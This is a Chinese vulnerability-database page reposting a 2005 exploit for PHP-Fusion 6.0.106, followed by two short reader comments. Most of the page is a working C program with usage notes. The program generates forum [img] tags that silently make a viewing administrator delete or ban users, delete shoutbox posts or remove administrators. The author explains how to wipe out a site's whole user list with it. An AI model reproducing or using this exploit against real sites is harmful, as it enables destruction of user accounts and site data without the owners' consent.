PHP-Fusion 6.0.106 – BBCode IMG Tag Script Injection
漏洞ID | 1055323 | 漏洞类型 | |
发布时间 | 2005-08-05 | 更新时间 | 2005-08-05 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
ahh I was hoping for some socket code :( /str0ke
Dark Assassins - http://dark-assassins.com/
Visit us on IRC @ irc.tddirc.net #DarkAssassins
PHP-Fusion [img][/img] exploit
Discovered/Coded by Easyex
Using the [img] [/img] codes we can get an administrator to do a function a normal member cannot do.
For example..
[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]
This could be in our signature, forum post or in a comment post. When an admin views the page with the malicious code it will automatically load and do the function we selected. In the example it would delete the shout box post with the id 1.
Because we are using the [img] [/img] code it just shows up as an invalid image.
Code usage:
./fusionimg <version> <dir> deluser <start> <end>
./fusionimg <version> <dir> banuser <start> <end>
./fusionimg <version> <dir> delshout <start end>
./fusionimg <version> <dir> deladmin <start end>
<version> is the PHP-Fusion version. enter 6.x or 5.x depending on the version number.
<start> is the start point of user id(s)
<end> is the end point of the user id(s)
So if we had a vulnerable host running PHP Fusion v6.00.106 or below with say 150 users and we wanted to delete them all we would type ./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that had the id: 5 we would type: ./fusionimg 6.x / deluser 5 5
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int usage() {
printf("Usage: ./fusionimg <version> <dir> <option> <start> <end>n");
printf("Example: ./fusionimg 6.x / deluser 1 500n");
exit(1);
}
int main (int argc, char *argv[]) {
printf("n");
printf("PHP-Fusion [img][/img] exploitn");
printf("Coded by Easyex from the Dark Assassins crewnn");
if(argc < 6 )
usage();
int i;
char cmd[512];
char option[512];
char version[512];
FILE *log;
log = fopen("exploit.txt", "w+");
if(log == 0) {
printf("[-] Error opening log file.n");
exit(-1);;
}
fprintf(log, "PHP-Fusion [img][/img] exploitn");
fprintf(log, "Discovered/Coded by Easyexnn");
if(strcmp(argv[1], "6.x") == 0) {
strncpy(version, "administration/", 512);
}
else if(strcmp(argv[1], "5.x") == 0) {
strncpy(version, "fusion_admin/", 512);
}
else {
printf("[-] Error, Invalid version!n");
exit(-1);;
}
// There are other options you can do, This is just some of them...
// If you need to find out a users id you can just go to members.php and click on the user you want and the id will show in the url like ?lookup=1
if(strcmp(argv[3], "deluser") == 0) {
strncpy(option, "members.php?step=delete&sortby=all&rowstart=0&user_id=", 512);
fprintf(log, "You have selected to delete %s > %s user(s)n", argv[4], argv[5]);
}
else if(strcmp(argv[3], "banuser") == 0) {
strncpy(option, "members.php?step=ban&act=on&sortby=all&rowstart=0&user_id=", 512);
fprintf(log, "You have selected to ban %s > %s user(s)n", argv[4], argv[5]);
}
else if(strcmp(argv[3], "delshout") == 0) {
strncpy(option, "shoutbox.php?action=delete&shout_id=", 512);
fprintf(log, "You have selected to delete %s > %s shoutbox post(s)n", argv[4], argv[5]);
}
// We can delete any account, But we cant add admin accounts
else if(strcmp(argv[3], "deladmin") == 0) {
strncpy(option, "administrators.php?remove=", 512);
fprintf(log, "You have selected to delete %s > %s administator(s)n", argv[4], argv[5]);
}
else {
printf("[-] Error, Invalid option!n");
exit(-1);
}
printf("[+] Generating image codes...nn");
fprintf(log, "Add the following lines of code into your signature, forum post or in a comment post:nn");
for (i = atoi(argv[4]); i <= atoi(argv[5]); i++) {
sprintf(cmd, "[img]%s%s%s%d[/img]", argv[2], version, option, i);
fprintf(log, "%sn", cmd);
}
printf("[+] Completed & logged to exploit.txtn");
exit(1);
}
// milw0rm.com [2005-08-05]
相关推荐: Mailtraq Remote Directory Traversal Vulnerability
Mailtraq Remote Directory Traversal Vulnerability 漏洞ID 1100003 漏洞类型 Input Validation Error 发布时间 2003-06-16 更新时间 2003-06-16 CVE编号 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666